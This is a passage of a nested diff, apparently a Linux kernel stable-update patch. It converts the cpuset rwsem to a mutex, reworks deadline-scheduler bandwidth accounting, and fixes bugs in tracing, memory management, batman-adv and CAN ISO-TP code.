+ 	spin_unlock_irq(&callback_lock);
+ out_unlock:
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	cpus_read_unlock();
+ 	return 0;
+ }
+@@ -3196,7 +3268,7 @@ static void cpuset_css_offline(struct cgroup_subsys_state *css)
+ 	struct cpuset *cs = css_cs(css);
+ 
+ 	cpus_read_lock();
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 
+ 	if (is_partition_valid(cs))
+ 		update_prstate(cs, 0);
+@@ -3215,7 +3287,7 @@ static void cpuset_css_offline(struct cgroup_subsys_state *css)
+ 	cpuset_dec();
+ 	clear_bit(CS_ONLINE, &cs->flags);
+ 
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	cpus_read_unlock();
+ }
+ 
+@@ -3228,7 +3300,7 @@ static void cpuset_css_free(struct cgroup_subsys_state *css)
+ 
+ static void cpuset_bind(struct cgroup_subsys_state *root_css)
+ {
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	spin_lock_irq(&callback_lock);
+ 
+ 	if (is_in_v2_mode()) {
+@@ -3241,7 +3313,7 @@ static void cpuset_bind(struct cgroup_subsys_state *root_css)
+ 	}
+ 
+ 	spin_unlock_irq(&callback_lock);
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ }
+ 
+ /*
+@@ -3262,14 +3334,14 @@ static int cpuset_can_fork(struct task_struct *task, struct css_set *cset)
+ 		return 0;
+ 
+ 	lockdep_assert_held(&cgroup_mutex);
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 
+ 	/* Check to see if task is allowed in the cpuset */
+ 	ret = cpuset_can_attach_check(cs);
+ 	if (ret)
+ 		goto out_unlock;
+ 
+-	ret = task_can_attach(task, cs->effective_cpus);
++	ret = task_can_attach(task);
+ 	if (ret)
+ 		goto out_unlock;
+ 
+@@ -3283,7 +3355,7 @@ static int cpuset_can_fork(struct task_struct *task, struct css_set *cset)
+ 	 */
+ 	cs->attach_in_progress++;
+ out_unlock:
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	return ret;
+ }
+ 
+@@ -3299,11 +3371,11 @@ static void cpuset_cancel_fork(struct task_struct *task, struct css_set *cset)
+ 	if (same_cs)
+ 		return;
+ 
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	cs->attach_in_progress--;
+ 	if (!cs->attach_in_progress)
+ 		wake_up(&cpuset_attach_wq);
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ }
+ 
+ /*
+@@ -3331,7 +3403,7 @@ static void cpuset_fork(struct task_struct *task)
+ 	}
+ 
+ 	/* CLONE_INTO_CGROUP */
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	guarantee_online_mems(cs, &cpuset_attach_nodemask_to);
+ 	cpuset_attach_task(cs, task);
+ 
+@@ -3339,7 +3411,7 @@ static void cpuset_fork(struct task_struct *task)
+ 	if (!cs->attach_in_progress)
+ 		wake_up(&cpuset_attach_wq);
+ 
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ }
+ 
+ struct cgroup_subsys cpuset_cgrp_subsys = {
+@@ -3369,8 +3441,6 @@ struct cgroup_subsys cpuset_cgrp_subsys = {
+ 
+ int __init cpuset_init(void)
+ {
+-	BUG_ON(percpu_init_rwsem(&cpuset_rwsem));
+-
+ 	BUG_ON(!alloc_cpumask_var(&top_cpuset.cpus_allowed, GFP_KERNEL));
+ 	BUG_ON(!alloc_cpumask_var(&top_cpuset.effective_cpus, GFP_KERNEL));
+ 	BUG_ON(!zalloc_cpumask_var(&top_cpuset.subparts_cpus, GFP_KERNEL));
+@@ -3442,7 +3512,7 @@ hotplug_update_tasks_legacy(struct cpuset *cs,
+ 	is_empty = cpumask_empty(cs->cpus_allowed) ||
+ 		   nodes_empty(cs->mems_allowed);
+ 
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 
+ 	/*
+ 	 * Move tasks to the nearest ancestor with execution resources,
+@@ -3452,7 +3522,7 @@ hotplug_update_tasks_legacy(struct cpuset *cs,
+ 	if (is_empty)
+ 		remove_tasks_in_empty_cpuset(cs);
+ 
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ }
+ 
+ static void
+@@ -3503,14 +3573,14 @@ static void cpuset_hotplug_update_tasks(struct cpuset *cs, struct tmpmasks *tmp)
+ retry:
+ 	wait_event(cpuset_attach_wq, cs->attach_in_progress == 0);
+ 
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 
+ 	/*
+ 	 * We have raced with task attaching. We wait until attaching
+ 	 * is finished, so we won't attach a task to an empty cpuset.
+ 	 */
+ 	if (cs->attach_in_progress) {
+-		percpu_up_write(&cpuset_rwsem);
++		mutex_unlock(&cpuset_mutex);
+ 		goto retry;
+ 	}
+ 
+@@ -3604,7 +3674,7 @@ update_tasks:
+ 		hotplug_update_tasks_legacy(cs, &new_cpus, &new_mems,
+ 					    cpus_updated, mems_updated);
+ 
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ }
+ 
+ /**
+@@ -3634,7 +3704,7 @@ static void cpuset_hotplug_workfn(struct work_struct *work)
+ 	if (on_dfl && !alloc_cpumasks(NULL, &tmp))
+ 		ptmp = &tmp;
+ 
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 
+ 	/* fetch the available cpus/mems and find out which changed how */
+ 	cpumask_copy(&new_cpus, cpu_active_mask);
+@@ -3691,7 +3761,7 @@ static void cpuset_hotplug_workfn(struct work_struct *work)
+ 		update_tasks_nodemask(&top_cpuset);
+ 	}
+ 
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 
+ 	/* if cpus or mems changed, we need to propagate to descendants */
+ 	if (cpus_updated || mems_updated) {
+@@ -4101,7 +4171,7 @@ void __cpuset_memory_pressure_bump(void)
+  *  - Used for /proc/<pid>/cpuset.
+  *  - No need to task_lock(tsk) on this tsk->cpuset reference, as it
+  *    doesn't really matter if tsk->cpuset changes after we read it,
+- *    and we take cpuset_rwsem, keeping cpuset_attach() from changing it
++ *    and we take cpuset_mutex, keeping cpuset_attach() from changing it
+  *    anyway.
+  */
+ int proc_cpuset_show(struct seq_file *m, struct pid_namespace *ns,
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index b23dcbeacdf33..0f6a92737c912 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -7475,6 +7475,7 @@ static int __sched_setscheduler(struct task_struct *p,
+ 	int reset_on_fork;
+ 	int queue_flags = DEQUEUE_SAVE | DEQUEUE_MOVE | DEQUEUE_NOCLOCK;
+ 	struct rq *rq;
++	bool cpuset_locked = false;
+ 
+ 	/* The pi code expects interrupts enabled */
+ 	BUG_ON(pi && in_interrupt());
+@@ -7524,8 +7525,14 @@ recheck:
+ 			return retval;
+ 	}
+ 
+-	if (pi)
+-		cpuset_read_lock();
++	/*
++	 * SCHED_DEADLINE bandwidth accounting relies on stable cpusets
++	 * information.
++	 */
++	if (dl_policy(policy) || dl_policy(p->policy)) {
++		cpuset_locked = true;
++		cpuset_lock();
++	}
+ 
+ 	/*
+ 	 * Make sure no PI-waiters arrive (or leave) while we are
+@@ -7601,8 +7608,8 @@ change:
+ 	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
+ 		policy = oldpolicy = -1;
+ 		task_rq_unlock(rq, p, &rf);
+-		if (pi)
+-			cpuset_read_unlock();
++		if (cpuset_locked)
++			cpuset_unlock();
+ 		goto recheck;
+ 	}
+ 
+@@ -7669,7 +7676,8 @@ change:
+ 	task_rq_unlock(rq, p, &rf);
+ 
+ 	if (pi) {
+-		cpuset_read_unlock();
++		if (cpuset_locked)
++			cpuset_unlock();
+ 		rt_mutex_adjust_pi(p);
+ 	}
+ 
+@@ -7681,8 +7689,8 @@ change:
+ 
+ unlock:
+ 	task_rq_unlock(rq, p, &rf);
+-	if (pi)
+-		cpuset_read_unlock();
++	if (cpuset_locked)
++		cpuset_unlock();
+ 	return retval;
+ }
+ 
+@@ -9075,8 +9083,7 @@ int cpuset_cpumask_can_shrink(const struct cpumask *cur,
+ 	return ret;
+ }
+ 
+-int task_can_attach(struct task_struct *p,
+-		    const struct cpumask *cs_effective_cpus)
++int task_can_attach(struct task_struct *p)
+ {
+ 	int ret = 0;
+ 
+@@ -9089,21 +9096,9 @@ int task_can_attach(struct task_struct *p,
+ 	 * success of set_cpus_allowed_ptr() on all attached tasks
+ 	 * before cpus_mask may be changed.
+ 	 */
+-	if (p->flags & PF_NO_SETAFFINITY) {
++	if (p->flags & PF_NO_SETAFFINITY)
+ 		ret = -EINVAL;
+-		goto out;
+-	}
+ 
+-	if (dl_task(p) && !cpumask_intersects(task_rq(p)->rd->span,
+-					      cs_effective_cpus)) {
+-		int cpu = cpumask_any_and(cpu_active_mask, cs_effective_cpus);
+-
+-		if (unlikely(cpu >= nr_cpu_ids))
+-			return -EINVAL;
+-		ret = dl_cpu_busy(cpu, p);
+-	}
+-
+-out:
+ 	return ret;
+ }
+ 
+@@ -9385,7 +9380,7 @@ static void cpuset_cpu_active(void)
+ static int cpuset_cpu_inactive(unsigned int cpu)
+ {
+ 	if (!cpuhp_tasks_frozen) {
+-		int ret = dl_cpu_busy(cpu, NULL);
++		int ret = dl_bw_check_overflow(cpu);
+ 
+ 		if (ret)
+ 			return ret;
+diff --git a/kernel/sched/deadline.c b/kernel/sched/deadline.c
+index f7d381b6c3133..9ce9810861ba5 100644
+--- a/kernel/sched/deadline.c
++++ b/kernel/sched/deadline.c
+@@ -16,6 +16,8 @@
+  *                    Fabio Checconi <fchecconi@gmail.com>
+  */
+ 
++#include <linux/cpuset.h>
++
+ /*
+  * Default limits for DL period; on the top end we guard against small util
+  * tasks still getting ridiculously long effective runtimes, on the bottom end we
+@@ -2597,6 +2599,12 @@ static void switched_from_dl(struct rq *rq, struct task_struct *p)
+ 	if (task_on_rq_queued(p) && p->dl.dl_runtime)
+ 		task_non_contending(p);
+ 
++	/*
++	 * In case a task is setscheduled out from SCHED_DEADLINE we need to
++	 * keep track of that on its cpuset (for correct bandwidth tracking).
++	 */
++	dec_dl_tasks_cs(p);
++
+ 	if (!task_on_rq_queued(p)) {
+ 		/*
+ 		 * Inactive timer is armed. However, p is leaving DEADLINE and
+@@ -2637,6 +2645,12 @@ static void switched_to_dl(struct rq *rq, struct task_struct *p)
+ 	if (hrtimer_try_to_cancel(&p->dl.inactive_timer) == 1)
+ 		put_task_struct(p);
+ 
++	/*
++	 * In case a task is setscheduled to SCHED_DEADLINE we need to keep
++	 * track of that on its cpuset (for correct bandwidth tracking).
++	 */
++	inc_dl_tasks_cs(p);
++
+ 	/* If p is not queued we will update its parameters at next wakeup. */
+ 	if (!task_on_rq_queued(p)) {
+ 		add_rq_bw(&p->dl, &rq->dl);
+@@ -3023,26 +3037,38 @@ int dl_cpuset_cpumask_can_shrink(const struct cpumask *cur,
+ 	return ret;
+ }
+ 
+-int dl_cpu_busy(int cpu, struct task_struct *p)
++enum dl_bw_request {
++	dl_bw_req_check_overflow = 0,
++	dl_bw_req_alloc,
++	dl_bw_req_free
++};
++
++static int dl_bw_manage(enum dl_bw_request req, int cpu, u64 dl_bw)
+ {
+-	unsigned long flags, cap;
++	unsigned long flags;
+ 	struct dl_bw *dl_b;
+-	bool overflow;
++	bool overflow = 0;
+ 
+ 	rcu_read_lock_sched();
+ 	dl_b = dl_bw_of(cpu);
+ 	raw_spin_lock_irqsave(&dl_b->lock, flags);
+-	cap = dl_bw_capacity(cpu);
+-	overflow = __dl_overflow(dl_b, cap, 0, p ? p->dl.dl_bw : 0);
+ 
+-	if (!overflow && p) {
+-		/*
+-		 * We reserve space for this task in the destination
+-		 * root_domain, as we can't fail after this point.
+-		 * We will free resources in the source root_domain
+-		 * later on (see set_cpus_allowed_dl()).
+-		 */
+-		__dl_add(dl_b, p->dl.dl_bw, dl_bw_cpus(cpu));
++	if (req == dl_bw_req_free) {
++		__dl_sub(dl_b, dl_bw, dl_bw_cpus(cpu));
++	} else {
++		unsigned long cap = dl_bw_capacity(cpu);
++
++		overflow = __dl_overflow(dl_b, cap, 0, dl_bw);
++
++		if (req == dl_bw_req_alloc && !overflow) {
++			/*
++			 * We reserve space in the destination
++			 * root_domain, as we can't fail after this point.
++			 * We will free resources in the source root_domain
++			 * later on (see set_cpus_allowed_dl()).
++			 */
++			__dl_add(dl_b, dl_bw, dl_bw_cpus(cpu));
++		}
+ 	}
+ 
+ 	raw_spin_unlock_irqrestore(&dl_b->lock, flags);
+@@ -3050,6 +3076,21 @@ int dl_cpu_busy(int cpu, struct task_struct *p)
+ 
+ 	return overflow ? -EBUSY : 0;
+ }
++
++int dl_bw_check_overflow(int cpu)
++{
++	return dl_bw_manage(dl_bw_req_check_overflow, cpu, 0);
++}
++
++int dl_bw_alloc(int cpu, u64 dl_bw)
++{
++	return dl_bw_manage(dl_bw_req_alloc, cpu, dl_bw);
++}
++
++void dl_bw_free(int cpu, u64 dl_bw)
++{
++	dl_bw_manage(dl_bw_req_free, cpu, dl_bw);
++}
+ #endif
+ 
+ #ifdef CONFIG_SCHED_DEBUG
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index d6d488e8eb554..b62d53d7c264f 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -330,7 +330,7 @@ extern void __getparam_dl(struct task_struct *p, struct sched_attr *attr);
+ extern bool __checkparam_dl(const struct sched_attr *attr);
+ extern bool dl_param_changed(struct task_struct *p, const struct sched_attr *attr);
+ extern int  dl_cpuset_cpumask_can_shrink(const struct cpumask *cur, const struct cpumask *trial);
+-extern int  dl_cpu_busy(int cpu, struct task_struct *p);
++extern int  dl_bw_check_overflow(int cpu);
+ 
+ #ifdef CONFIG_CGROUP_SCHED
+ 
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index af33c5a4166d4..1a87cb70f1eb5 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -4128,8 +4128,15 @@ static void *s_start(struct seq_file *m, loff_t *pos)
+ 	 * will point to the same string as current_trace->name.
+ 	 */
+ 	mutex_lock(&trace_types_lock);
+-	if (unlikely(tr->current_trace && iter->trace->name != tr->current_trace->name))
++	if (unlikely(tr->current_trace && iter->trace->name != tr->current_trace->name)) {
++		/* Close iter->trace before switching to the new current tracer */
++		if (iter->trace->close)
++			iter->trace->close(iter);
+ 		*iter->trace = *tr->current_trace;
++		/* Reopen the new current tracer */
++		if (iter->trace->open)
++			iter->trace->open(iter);
++	}
+ 	mutex_unlock(&trace_types_lock);
+ 
+ #ifdef CONFIG_TRACER_MAX_TRACE
+@@ -5189,11 +5196,17 @@ int tracing_set_cpumask(struct trace_array *tr,
+ 				!cpumask_test_cpu(cpu, tracing_cpumask_new)) {
+ 			atomic_inc(&per_cpu_ptr(tr->array_buffer.data, cpu)->disabled);
+ 			ring_buffer_record_disable_cpu(tr->array_buffer.buffer, cpu);
++#ifdef CONFIG_TRACER_MAX_TRACE
++			ring_buffer_record_disable_cpu(tr->max_buffer.buffer, cpu);
++#endif
+ 		}
+ 		if (!cpumask_test_cpu(cpu, tr->tracing_cpumask) &&
+ 				cpumask_test_cpu(cpu, tracing_cpumask_new)) {
+ 			atomic_dec(&per_cpu_ptr(tr->array_buffer.data, cpu)->disabled);
+ 			ring_buffer_record_enable_cpu(tr->array_buffer.buffer, cpu);
++#ifdef CONFIG_TRACER_MAX_TRACE
++			ring_buffer_record_enable_cpu(tr->max_buffer.buffer, cpu);
++#endif
+ 		}
+ 	}
+ 	arch_spin_unlock(&tr->max_lock);
+diff --git a/kernel/trace/trace_irqsoff.c b/kernel/trace/trace_irqsoff.c
+index 590b3d51afae9..ba37f768e2f27 100644
+--- a/kernel/trace/trace_irqsoff.c
++++ b/kernel/trace/trace_irqsoff.c
+@@ -231,7 +231,8 @@ static void irqsoff_trace_open(struct trace_iterator *iter)
+ {
+ 	if (is_graph(iter->tr))
+ 		graph_trace_open(iter);
+-
++	else
++		iter->private = NULL;
+ }
+ 
+ static void irqsoff_trace_close(struct trace_iterator *iter)
+diff --git a/kernel/trace/trace_sched_wakeup.c b/kernel/trace/trace_sched_wakeup.c
+index 330aee1c1a49e..0469a04a355f2 100644
+--- a/kernel/trace/trace_sched_wakeup.c
++++ b/kernel/trace/trace_sched_wakeup.c
+@@ -168,6 +168,8 @@ static void wakeup_trace_open(struct trace_iterator *iter)
+ {
+ 	if (is_graph(iter->tr))
+ 		graph_trace_open(iter);
++	else
++		iter->private = NULL;
+ }
+ 
+ static void wakeup_trace_close(struct trace_iterator *iter)
+diff --git a/lib/clz_ctz.c b/lib/clz_ctz.c
+index 0d3a686b5ba29..fb8c0c5c2bd27 100644
+--- a/lib/clz_ctz.c
++++ b/lib/clz_ctz.c
+@@ -28,36 +28,16 @@ int __weak __clzsi2(int val)
+ }
+ EXPORT_SYMBOL(__clzsi2);
+ 
+-int __weak __clzdi2(long val);
+-int __weak __ctzdi2(long val);
+-#if BITS_PER_LONG == 32
+-
+-int __weak __clzdi2(long val)
++int __weak __clzdi2(u64 val);
++int __weak __clzdi2(u64 val)
+ {
+-	return 32 - fls((int)val);
++	return 64 - fls64(val);
+ }
+ EXPORT_SYMBOL(__clzdi2);
+ 
+-int __weak __ctzdi2(long val)
++int __weak __ctzdi2(u64 val);
++int __weak __ctzdi2(u64 val)
+ {
+-	return __ffs((u32)val);
++	return __ffs64(val);
+ }
+ EXPORT_SYMBOL(__ctzdi2);
+-
+-#elif BITS_PER_LONG == 64
+-
+-int __weak __clzdi2(long val)
+-{
+-	return 64 - fls64((u64)val);
+-}
+-EXPORT_SYMBOL(__clzdi2);
+-
+-int __weak __ctzdi2(long val)
+-{
+-	return __ffs64((u64)val);
+-}
+-EXPORT_SYMBOL(__ctzdi2);
+-
+-#else
+-#error BITS_PER_LONG not 32 or 64
+-#endif
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 47d0c95b9a01e..250b4c67fac8f 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -4333,6 +4333,9 @@ static inline bool mas_wr_append(struct ma_wr_state *wr_mas)
+ 	struct ma_state *mas = wr_mas->mas;
+ 	unsigned char node_pivots = mt_pivots[wr_mas->type];
+ 
++	if (mt_in_rcu(mas->tree))
++		return false;
++
+ 	if ((mas->index != wr_mas->r_min) && (mas->last == wr_mas->r_max)) {
+ 		if (new_end < node_pivots)
+ 			wr_mas->pivots[new_end] = wr_mas->pivots[end];
+diff --git a/lib/radix-tree.c b/lib/radix-tree.c
+index 3c78e1e8b2ad6..2ec38f08e4f0e 100644
+--- a/lib/radix-tree.c
++++ b/lib/radix-tree.c
+@@ -1134,7 +1134,6 @@ static void set_iter_tags(struct radix_tree_iter *iter,
+ void __rcu **radix_tree_iter_resume(void __rcu **slot,
+ 					struct radix_tree_iter *iter)
+ {
+-	slot++;
+ 	iter->index = __radix_tree_iter_add(iter, 1);
+ 	iter->next_index = iter->index;
+ 	iter->tags = 0;
+diff --git a/mm/madvise.c b/mm/madvise.c
+index d03e149ffe6e8..5973399b2f9b7 100644
+--- a/mm/madvise.c
++++ b/mm/madvise.c
+@@ -654,8 +654,8 @@ static int madvise_free_pte_range(pmd_t *pmd, unsigned long addr,
+ 		 * deactivate all pages.
+ 		 */
+ 		if (folio_test_large(folio)) {
+-			if (folio_mapcount(folio) != 1)
+-				goto out;
++			if (folio_estimated_sharers(folio) != 1)
++				break;
+ 			folio_get(folio);
+ 			if (!folio_trylock(folio)) {
+ 				folio_put(folio);
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index 4457f9423e2c1..99de0328d1bed 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -2591,10 +2591,13 @@ retry:
+ 	if (ret > 0) {
+ 		ret = soft_offline_in_use_page(page);
+ 	} else if (ret == 0) {
+-		if (!page_handle_poison(page, true, false) && try_again) {
+-			try_again = false;
+-			flags &= ~MF_COUNT_INCREASED;
+-			goto retry;
++		if (!page_handle_poison(page, true, false)) {
++			if (try_again) {
++				try_again = false;
++				flags &= ~MF_COUNT_INCREASED;
++				goto retry;
++			}
++			ret = -EBUSY;
+ 		}
+ 	}
+ 
+diff --git a/mm/shmem.c b/mm/shmem.c
+index aba041a3df739..10365ced5b1fc 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -800,14 +800,16 @@ unsigned long shmem_partial_swap_usage(struct address_space *mapping,
+ 	XA_STATE(xas, &mapping->i_pages, start);
+ 	struct page *page;
+ 	unsigned long swapped = 0;
++	unsigned long max = end - 1;
+ 
+ 	rcu_read_lock();
+-	xas_for_each(&xas, page, end - 1) {
++	xas_for_each(&xas, page, max) {
+ 		if (xas_retry(&xas, page))
+ 			continue;
+ 		if (xa_is_value(page))
+ 			swapped++;
+-
++		if (xas.xa_index == max)
++			break;
+ 		if (need_resched()) {
+ 			xas_pause(&xas);
+ 			cond_resched_rcu();
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index d5dc361dc104d..80bd104a4d42e 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -2909,6 +2909,10 @@ void *vmap_pfn(unsigned long *pfns, unsigned int count, pgprot_t prot)
+ 		free_vm_area(area);
+ 		return NULL;
+ 	}
++
++	flush_cache_vmap((unsigned long)area->addr,
++			 (unsigned long)area->addr + count * PAGE_SIZE);
++
+ 	return area->addr;
+ }
+ EXPORT_SYMBOL_GPL(vmap_pfn);
+diff --git a/net/Makefile b/net/Makefile
+index 6a62e5b273781..0914bea9c335f 100644
+--- a/net/Makefile
++++ b/net/Makefile
+@@ -23,6 +23,7 @@ obj-$(CONFIG_BPFILTER)		+= bpfilter/
+ obj-$(CONFIG_PACKET)		+= packet/
+ obj-$(CONFIG_NET_KEY)		+= key/
+ obj-$(CONFIG_BRIDGE)		+= bridge/
++obj-$(CONFIG_NET_DEVLINK)	+= devlink/
+ obj-$(CONFIG_NET_DSA)		+= dsa/
+ obj-$(CONFIG_ATALK)		+= appletalk/
+ obj-$(CONFIG_X25)		+= x25/
+diff --git a/net/batman-adv/bat_v_elp.c b/net/batman-adv/bat_v_elp.c
+index f1741fbfb6178..98a624f32b946 100644
+--- a/net/batman-adv/bat_v_elp.c
++++ b/net/batman-adv/bat_v_elp.c
+@@ -506,7 +506,7 @@ int batadv_v_elp_packet_recv(struct sk_buff *skb,
+ 	struct batadv_priv *bat_priv = netdev_priv(if_incoming->soft_iface);
+ 	struct batadv_elp_packet *elp_packet;
+ 	struct batadv_hard_iface *primary_if;
+-	struct ethhdr *ethhdr = (struct ethhdr *)skb_mac_header(skb);
++	struct ethhdr *ethhdr;
+ 	bool res;
+ 	int ret = NET_RX_DROP;
+ 
+@@ -514,6 +514,7 @@ int batadv_v_elp_packet_recv(struct sk_buff *skb,
+ 	if (!res)
+ 		goto free_skb;
+ 
++	ethhdr = eth_hdr(skb);
+ 	if (batadv_is_my_mac(bat_priv, ethhdr->h_source))
+ 		goto free_skb;
+ 
+diff --git a/net/batman-adv/bat_v_ogm.c b/net/batman-adv/bat_v_ogm.c
+index 033639df96d85..9f4815f4c8e89 100644
+--- a/net/batman-adv/bat_v_ogm.c
++++ b/net/batman-adv/bat_v_ogm.c
+@@ -124,8 +124,10 @@ static void batadv_v_ogm_send_to_if(struct sk_buff *skb,
+ {
+ 	struct batadv_priv *bat_priv = netdev_priv(hard_iface->soft_iface);
+ 
+-	if (hard_iface->if_status != BATADV_IF_ACTIVE)
++	if (hard_iface->if_status != BATADV_IF_ACTIVE) {
++		kfree_skb(skb);
+ 		return;
++	}
+ 
+ 	batadv_inc_counter(bat_priv, BATADV_CNT_MGMT_TX);
+ 	batadv_add_counter(bat_priv, BATADV_CNT_MGMT_TX_BYTES,
+@@ -986,7 +988,7 @@ int batadv_v_ogm_packet_recv(struct sk_buff *skb,
+ {
+ 	struct batadv_priv *bat_priv = netdev_priv(if_incoming->soft_iface);
+ 	struct batadv_ogm2_packet *ogm_packet;
+-	struct ethhdr *ethhdr = eth_hdr(skb);
++	struct ethhdr *ethhdr;
+ 	int ogm_offset;
+ 	u8 *packet_pos;
+ 	int ret = NET_RX_DROP;
+@@ -1000,6 +1002,7 @@ int batadv_v_ogm_packet_recv(struct sk_buff *skb,
+ 	if (!batadv_check_management_packet(skb, if_incoming, BATADV_OGM2_HLEN))
+ 		goto free_skb;
+ 
++	ethhdr = eth_hdr(skb);
+ 	if (batadv_is_my_mac(bat_priv, ethhdr->h_source))
+ 		goto free_skb;
+ 
+diff --git a/net/batman-adv/hard-interface.c b/net/batman-adv/hard-interface.c
+index 41c1ad33d009f..24c9c0c3f3166 100644
+--- a/net/batman-adv/hard-interface.c
++++ b/net/batman-adv/hard-interface.c
+@@ -630,7 +630,19 @@ out:
+  */
+ void batadv_update_min_mtu(struct net_device *soft_iface)
+ {
+-	soft_iface->mtu = batadv_hardif_min_mtu(soft_iface);
++	struct batadv_priv *bat_priv = netdev_priv(soft_iface);
++	int limit_mtu;
++	int mtu;
++
++	mtu = batadv_hardif_min_mtu(soft_iface);
++
++	if (bat_priv->mtu_set_by_user)
++		limit_mtu = bat_priv->mtu_set_by_user;
++	else
++		limit_mtu = ETH_DATA_LEN;
++
++	mtu = min(mtu, limit_mtu);
++	dev_set_mtu(soft_iface, mtu);
+ 
+ 	/* Check if the local translate table should be cleaned up to match a
+ 	 * new (and smaller) MTU.
+diff --git a/net/batman-adv/netlink.c b/net/batman-adv/netlink.c
+index a5e4a4e976cf3..86e0664e0511b 100644
+--- a/net/batman-adv/netlink.c
++++ b/net/batman-adv/netlink.c
+@@ -495,7 +495,10 @@ static int batadv_netlink_set_mesh(struct sk_buff *skb, struct genl_info *info)
+ 		attr = info->attrs[BATADV_ATTR_FRAGMENTATION_ENABLED];
+ 
+ 		atomic_set(&bat_priv->fragmentation, !!nla_get_u8(attr));
++
++		rtnl_lock();
+ 		batadv_update_min_mtu(bat_priv->soft_iface);
++		rtnl_unlock();
+ 	}
+ 
+ 	if (info->attrs[BATADV_ATTR_GW_BANDWIDTH_DOWN]) {
+diff --git a/net/batman-adv/soft-interface.c b/net/batman-adv/soft-interface.c
+index 0f5c0679b55a2..38d411a52f331 100644
+--- a/net/batman-adv/soft-interface.c
++++ b/net/batman-adv/soft-interface.c
+@@ -154,11 +154,14 @@ static int batadv_interface_set_mac_addr(struct net_device *dev, void *p)
+ 
+ static int batadv_interface_change_mtu(struct net_device *dev, int new_mtu)
+ {
++	struct batadv_priv *bat_priv = netdev_priv(dev);
++
+ 	/* check ranges */
+ 	if (new_mtu < 68 || new_mtu > batadv_hardif_min_mtu(dev))
+ 		return -EINVAL;
+ 
+ 	dev->mtu = new_mtu;
++	bat_priv->mtu_set_by_user = new_mtu;
+ 
+ 	return 0;
+ }
+diff --git a/net/batman-adv/translation-table.c b/net/batman-adv/translation-table.c
+index 01d30c1e412c7..5d8cee74772fe 100644
+--- a/net/batman-adv/translation-table.c
++++ b/net/batman-adv/translation-table.c
+@@ -774,7 +774,6 @@ check_roaming:
+ 		if (roamed_back) {
+ 			batadv_tt_global_free(bat_priv, tt_global,
+ 					      "Roaming canceled");
+-			tt_global = NULL;
+ 		} else {
+ 			/* The global entry has to be marked as ROAMING and
+ 			 * has to be kept for consistency purpose
+diff --git a/net/batman-adv/types.h b/net/batman-adv/types.h
+index 758cd797a063b..76791815b26ba 100644
+--- a/net/batman-adv/types.h
++++ b/net/batman-adv/types.h
+@@ -1546,6 +1546,12 @@ struct batadv_priv {
+ 	/** @soft_iface: net device which holds this struct as private data */
+ 	struct net_device *soft_iface;
+ 
++	/**
++	 * @mtu_set_by_user: MTU was set once by user
++	 * protected by rtnl_lock
++	 */
++	int mtu_set_by_user;
++
+ 	/**
+ 	 * @bat_counters: mesh internal traffic statistic counters (see
+ 	 *  batadv_counters)
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index b3c2a49b189cc..8c97f4061ffd7 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -175,12 +175,6 @@ static bool isotp_register_rxid(struct isotp_sock *so)
+ 	return (isotp_bc_flags(so) == 0);
+ }
+ 
+-static bool isotp_register_txecho(struct isotp_sock *so)
+-{
+-	/* all modes but SF_BROADCAST register for tx echo skbs */
+-	return (isotp_bc_flags(so) != CAN_ISOTP_SF_BROADCAST);
+-}
+-
+ static enum hrtimer_restart isotp_rx_timer_handler(struct hrtimer *hrtimer)
+ {
+ 	struct isotp_sock *so = container_of(hrtimer, struct isotp_sock,
+@@ -1176,7 +1170,7 @@ static int isotp_release(struct socket *sock)
+ 	lock_sock(sk);
+ 
+ 	/* remove current filters & unregister */
+-	if (so->bound && isotp_register_txecho(so)) {
++	if (so->bound) {
+ 		if (so->ifindex) {
+ 			struct net_device *dev;
+ 
+@@ -1293,14 +1287,12 @@ static int isotp_bind(struct socket *sock, struct sockaddr *uaddr, int len)
+ 		can_rx_register(net, dev, rx_id, SINGLE_MASK(rx_id),
+ 				isotp_rcv, sk, "isotp", sk);
+ 
+-	if (isotp_register_txecho(so)) {
+-		/* no consecutive frame echo skb in flight */
+-		so->cfecho = 0;
++	/* no consecutive frame echo skb in flight */
++	so->cfecho = 0;
+ 
+-		/* register for echo skb's */
